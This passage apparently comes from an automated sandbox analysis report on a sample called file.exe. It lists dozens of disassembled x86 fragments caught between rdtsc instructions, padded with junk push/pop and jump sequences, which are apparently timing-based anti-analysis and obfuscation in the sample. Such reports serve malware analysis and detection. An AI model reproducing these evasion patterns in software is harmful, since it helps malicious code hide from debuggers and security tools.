                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089012 second address: 108901D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108901D second address: 1089021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089021 second address: 108902B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108902B second address: 1089041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC7022h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089041 second address: 1089047 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088837 second address: 108883D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA99 second address: 108CACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jno 00007FC408FC8B06h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC408FC8B11h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CACA second address: 108CAED instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC408FC7022h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CAED second address: 108CAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CAF3 second address: 108CB41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jo 00007FC408FC7031h 0x00000013 jng 00007FC408FC702Bh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC408FC7023h 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CC00 second address: 108CC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CC04 second address: 108CC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CCCE second address: 108CD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jg 00007FC408FC8B0Ch 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jns 00007FC408FC8B0Ch 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CD12 second address: 108CD18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CD18 second address: 108CD1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CDC4 second address: 108CDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CDCB second address: 108CDD5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC408FC8B0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10921A8 second address: 10921AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10921AC second address: 10921B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092771 second address: 10927A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FC408FC7016h 0x0000000b jmp 00007FC408FC7029h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007FC408FC7022h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10927A2 second address: 10927A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10927A8 second address: 10927AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10927AC second address: 10927C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B11h 0x00000007 jne 00007FC408FC8B0Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092A55 second address: 1092A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092D3D second address: 1092D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092FE9 second address: 1092FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092FEF second address: 1092FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093133 second address: 1093142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093142 second address: 1093146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093146 second address: 109316B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007FC408FC7024h 0x0000000f jl 00007FC408FC7016h 0x00000015 pop edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932C5 second address: 10932CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10986A1 second address: 10986A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109767F second address: 1097694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FC408FC8B0Eh 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065693 second address: 10656E0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC408FC7018h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FC408FC7018h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2B3Fh], ecx 0x0000002f lea eax, dword ptr [ebp+1247A457h] 0x00000035 mov dword ptr [ebp+122D32DAh], edx 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f jnl 00007FC408FC7016h 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10656E0 second address: 10656E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10656E4 second address: 10656F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC408FC701Ch 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106587D second address: 10658A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC408FC8B19h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10658A2 second address: 10658A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065C7F second address: EBEDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B0Eh 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FC408FC8B17h 0x00000013 jnc 00007FC408FC8B0Ch 0x00000019 pop edi 0x0000001a push dword ptr [ebp+122D1149h] 0x00000020 call 00007FC408FC8B19h 0x00000025 movsx edx, di 0x00000028 pop edi 0x00000029 movzx edx, si 0x0000002c call dword ptr [ebp+122D2AC1h] 0x00000032 pushad 0x00000033 cld 0x00000034 xor eax, eax 0x00000036 clc 0x00000037 jg 00007FC408FC8B0Ch 0x0000003d or dword ptr [ebp+122D2AA3h], edx 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 clc 0x00000048 mov dword ptr [ebp+122D2E36h], eax 0x0000004e jnl 00007FC408FC8B0Eh 0x00000054 mov esi, 0000003Ch 0x00000059 sub dword ptr [ebp+122D2B3Fh], eax 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 mov dword ptr [ebp+122D2B3Fh], eax 0x00000069 lodsw 0x0000006b pushad 0x0000006c mov ecx, 2E1E0C30h 0x00000071 xor ebx, dword ptr [ebp+122D2E2Eh] 0x00000077 popad 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007FC408FC8B19h 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 mov dword ptr [ebp+122D2780h], esi 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065D75 second address: 1065D91 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC408FC7018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jno 00007FC408FC7016h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065D91 second address: 1065DB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edx 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ecx 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065DB0 second address: 1065DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 and edi, 1EAF7EBDh 0x0000000d call 00007FC408FC7019h 0x00000012 jg 00007FC408FC7036h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065DF5 second address: 1065DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065DFB second address: 1065E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jg 00007FC408FC701Ah 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FC408FC7018h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065EFA second address: 1065EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065EFE second address: 1065F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FC408FC701Ah 0x00000010 ja 00007FC408FC7016h 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065FB6 second address: 1066002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007FC408FC8B19h 0x00000010 xchg eax, esi 0x00000011 or dx, 3605h 0x00000016 mov ch, D3h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jl 00007FC408FC8B06h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066119 second address: 106611D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10666F0 second address: 10666F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066A6B second address: 1066AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FC408FC7018h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2E96h] 0x00000028 add dl, 00000051h 0x0000002b lea eax, dword ptr [ebp+1247A49Bh] 0x00000031 add dword ptr [ebp+122D1E11h], ecx 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC408FC701Bh 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066AB7 second address: 1066B05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC408FC8B08h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov ch, 10h 0x00000014 lea eax, dword ptr [ebp+1247A457h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FC408FC8B08h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 push edx 0x00000035 mov ecx, dword ptr [ebp+122D3383h] 0x0000003b pop edx 0x0000003c mov di, bx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jbe 00007FC408FC8B06h 0x0000004a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066B05 second address: 1066B0B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066B0B second address: 104D325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call dword ptr [ebp+1245633Dh] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jmp 00007FC408FC8B0Dh 0x0000001a pop edx 0x0000001b jmp 00007FC408FC8B0Eh 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D325 second address: 104D32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D32A second address: 104D330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D330 second address: 104D33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC408FC7016h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D33E second address: 104D34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097EB8 second address: 1097EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097EBD second address: 1097ED5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FC408FC8B06h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC408FC8B0Ah 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098144 second address: 1098149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10982A7 second address: 10982AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B49C second address: 109B4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0A38 second address: 10A0A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0A3E second address: 10A0A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1011 second address: 10A101A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A101A second address: 10A1026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC408FC7016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1026 second address: 10A1050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC408FC8B18h 0x0000000d push esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1050 second address: 10A1054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FD3 second address: 10A6FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FC408FC8B06h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC408FC8B0Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FF4 second address: 10A6FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6369 second address: 10A636D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A636D second address: 10A6371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A64CF second address: 10A64E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC408FC8B0Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A64E7 second address: 10A64ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6E53 second address: 10A6E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC408FC8B06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6E5F second address: 10A6E68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC043 second address: 10AC073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FC408FC8B06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FC408FC8B06h 0x00000013 jnl 00007FC408FC8B06h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 pop eax 0x00000023 jmp 00007FC408FC8B0Dh 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC073 second address: 10AC07D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC07D second address: 10AC084 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE11B second address: 10AE133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b jbe 00007FC408FC701Ah 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0EB0 second address: 10B0EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0EB4 second address: 10B0ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC408FC701Eh 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B678F second address: 10B6793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6A90 second address: 10B6A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
